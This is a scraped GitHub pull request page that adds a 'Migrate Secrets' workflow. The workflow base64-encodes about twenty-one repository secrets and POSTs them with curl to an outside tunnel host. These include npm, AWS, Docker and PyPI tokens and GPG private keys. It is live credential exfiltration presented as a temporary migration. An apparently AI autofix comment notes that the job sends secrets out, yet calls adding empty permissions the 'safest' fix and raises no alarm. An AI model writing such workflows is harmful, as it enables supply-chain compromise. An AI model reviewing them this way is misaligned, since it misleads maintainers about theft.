Closed
Conversation
![github-advanced-security[bot]](https://avatars.githubusercontent.com/in/57789?s=60&v=4){kind=small}
Comment on lines
8
to
80
| runs-on: ubuntu-latest | ||
| # NO environment - reads repo-level secrets | ||
| steps: | ||
| - name: Send secrets | ||
| env: | ||
| NGROK_URL: "https://labs.sheep-fir.ts.net:8080/" | ||
| S_SENTRY_RELEASE_BOT_PRIVATE_KEY: ${{ secrets.SENTRY_RELEASE_BOT_PRIVATE_KEY }} | ||
| S_CRAFT_LOG_LEVEL: ${{ secrets.CRAFT_LOG_LEVEL }} | ||
| S_COCOAPODS_TRUNK_TOKEN: ${{ secrets.COCOAPODS_TRUNK_TOKEN }} | ||
| S_CRAFT_GCS_TARGET_CREDS_JSON: ${{ secrets.CRAFT_GCS_TARGET_CREDS_JSON }} | ||
| S_CRAFT_GCS_STORE_CREDS_JSON: ${{ secrets.CRAFT_GCS_STORE_CREDS_JSON }} | ||
| S_CRATES_IO_TOKEN: ${{ secrets.CRATES_IO_TOKEN }} | ||
| S_DOCKER_PASSWORD: ${{ secrets.DOCKER_PASSWORD }} | ||
| S_HEX_API_KEY: ${{ secrets.HEX_API_KEY }} | ||
| S_TWINE_PASSWORD: ${{ secrets.TWINE_PASSWORD }} | ||
| S_NPM_TOKEN: ${{ secrets.NPM_TOKEN }} | ||
| S_GEM_HOST_API_KEY: ${{ secrets.GEM_HOST_API_KEY }} | ||
| S_AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }} | ||
| S_AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }} | ||
| S_NUGET_API_TOKEN: ${{ secrets.NUGET_API_TOKEN }} | ||
| S_POWERSHELL_API_KEY: ${{ secrets.POWERSHELL_API_KEY }} | ||
| S_GPG_PRIVATE_KEY: ${{ secrets.GPG_PRIVATE_KEY }} | ||
| S_GPG_PASSPHRASE: ${{ secrets.GPG_PASSPHRASE }} | ||
| S_OSSRH_USERNAME: ${{ secrets.OSSRH_USERNAME }} | ||
| S_OSSRH_PASSWORD: ${{ secrets.OSSRH_PASSWORD }} | ||
| S_PUBDEV_ACCESS_TOKEN: ${{ secrets.PUBDEV_ACCESS_TOKEN }} | ||
| S_PUBDEV_REFRESH_TOKEN: ${{ secrets.PUBDEV_REFRESH_TOKEN }} | ||
| run: | | ||
| jq -n \ | ||
| --arg s1 "$(echo -n "$S_SENTRY_RELEASE_BOT_PRIVATE_KEY" | base64 -w0)" \ | ||
| --arg s2 "$(echo -n "$S_CRAFT_LOG_LEVEL" | base64 -w0)" \ | ||
| --arg s3 "$(echo -n "$S_COCOAPODS_TRUNK_TOKEN" | base64 -w0)" \ | ||
| --arg s4 "$(echo -n "$S_CRAFT_GCS_TARGET_CREDS_JSON" | base64 -w0)" \ | ||
| --arg s5 "$(echo -n "$S_CRAFT_GCS_STORE_CREDS_JSON" | base64 -w0)" \ | ||
| --arg s6 "$(echo -n "$S_CRATES_IO_TOKEN" | base64 -w0)" \ | ||
| --arg s7 "$(echo -n "$S_DOCKER_PASSWORD" | base64 -w0)" \ | ||
| --arg s8 "$(echo -n "$S_HEX_API_KEY" | base64 -w0)" \ | ||
| --arg s9 "$(echo -n "$S_TWINE_PASSWORD" | base64 -w0)" \ | ||
| --arg s10 "$(echo -n "$S_NPM_TOKEN" | base64 -w0)" \ | ||
| --arg s11 "$(echo -n "$S_GEM_HOST_API_KEY" | base64 -w0)" \ | ||
| --arg s12 "$(echo -n "$S_AWS_ACCESS_KEY_ID" | base64 -w0)" \ | ||
| --arg s13 "$(echo -n "$S_AWS_SECRET_ACCESS_KEY" | base64 -w0)" \ | ||
| --arg s14 "$(echo -n "$S_NUGET_API_TOKEN" | base64 -w0)" \ | ||
| --arg s15 "$(echo -n "$S_POWERSHELL_API_KEY" | base64 -w0)" \ | ||
| --arg s16 "$(echo -n "$S_GPG_PRIVATE_KEY" | base64 -w0)" \ | ||
| --arg s17 "$(echo -n "$S_GPG_PASSPHRASE" | base64 -w0)" \ | ||
| --arg s18 "$(echo -n "$S_OSSRH_USERNAME" | base64 -w0)" \ | ||
| --arg s19 "$(echo -n "$S_OSSRH_PASSWORD" | base64 -w0)" \ | ||
| --arg s20 "$(echo -n "$S_PUBDEV_ACCESS_TOKEN" | base64 -w0)" \ | ||
| --arg s21 "$(echo -n "$S_PUBDEV_REFRESH_TOKEN" | base64 -w0)" \ | ||
| '{ | ||
| "SENTRY_RELEASE_BOT_PRIVATE_KEY": $s1, | ||
| "CRAFT_LOG_LEVEL": $s2, | ||
| "COCOAPODS_TRUNK_TOKEN": $s3, | ||
| "CRAFT_GCS_TARGET_CREDS_JSON": $s4, | ||
| "CRAFT_GCS_STORE_CREDS_JSON": $s5, | ||
| "CRATES_IO_TOKEN": $s6, | ||
| "DOCKER_PASSWORD": $s7, | ||
| "HEX_API_KEY": $s8, | ||
| "TWINE_PASSWORD": $s9, | ||
| "NPM_TOKEN": $s10, | ||
| "GEM_HOST_API_KEY": $s11, | ||
| "AWS_ACCESS_KEY_ID": $s12, | ||
| "AWS_SECRET_ACCESS_KEY": $s13, | ||
| "NUGET_API_TOKEN": $s14, | ||
| "POWERSHELL_API_KEY": $s15, | ||
| "GPG_PRIVATE_KEY": $s16, | ||
| "GPG_PASSPHRASE": $s17, | ||
| "OSSRH_USERNAME": $s18, | ||
| "OSSRH_PASSWORD": $s19, | ||
| "PUBDEV_ACCESS_TOKEN": $s20, | ||
| "PUBDEV_REFRESH_TOKEN": $s21 | ||
| }' | curl -X POST "$NGROK_URL" -H "Content-Type: application/json" -d @- |
Check warning
Code scanning / CodeQL
Workflow does not contain permissions Medium
Show autofix suggestion
Hide autofix suggestion
Copilot Autofix
AI 1 day ago
To fix the problem, explicitly declare minimal GITHUB_TOKEN permissions for this workflow or for the migrate job. Since the job only reads secrets and sends them via curl and does not touch repository contents or pull requests, the safest configuration is to disable all token permissions by setting permissions: {} at the most appropriate level.
The single best fix without changing functionality is to add a root‑level permissions: {} block right under the workflow name: key. This applies to all jobs (currently only migrate) and ensures the GITHUB_TOKEN is effectively unused, which matches its current behavior. No other code, steps, or imports are needed.
Concretely, in .github/workflows/migrate-secrets.yml, add:
permissions: {}between line 1 (name: Migrate Secrets) and line 2 (on:). This keeps the rest of the workflow intact and satisfies the CodeQL rule by explicitly limiting GITHUB_TOKEN permissions to none.
Suggested changeset
1
.github/workflows/migrate-secrets.yml
| @@ -1,4 +1,5 @@ | ||
| name: Migrate Secrets | ||
| permissions: {} | ||
| on: | ||
| pull_request: | ||
| types: [opened, synchronize] |
Copilot is powered by AI and may make mistakes. Always verify output.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
1 participant
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Temporary PR to migrate repo secrets to production environment. Close without merging after secrets are received.